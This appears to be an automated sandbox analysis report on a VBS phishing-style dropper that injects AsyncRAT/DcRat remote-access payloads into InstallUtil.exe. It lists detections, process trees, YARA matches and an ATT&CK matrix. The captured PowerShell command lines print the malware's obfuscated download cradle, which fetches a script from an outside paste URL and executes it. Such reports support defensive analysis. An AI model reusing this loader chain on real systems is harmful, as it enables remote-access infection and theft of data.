Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: lvvchi0q.dll.15.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"	Jump to behavior

Source: InstallUtil.exe, 0000000E.00000003.498514895.0000000005872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910897890.00000000033B3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected DcRat

Source: Yara match	File source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Remote Access Functionality

Yara detected DcRat

Source: Yara match	File source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	1 Scheduled Task/Job	412 Process Injection	221 Scripting	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	121 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	2 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	13 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Re-RFQ - PN List.vbs	3%	Virustotal		Browse
Re-RFQ - PN List.vbs	12%	ReversingLabs	Script-WScript.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	100%	Avira	TR/Dropper.Gen
C:\Users\Public\gia9ab2dg0.PS1	100%	Avira	DR/PShell.G2
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	100%	Avira	VBS/PSRunner.VPAY
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
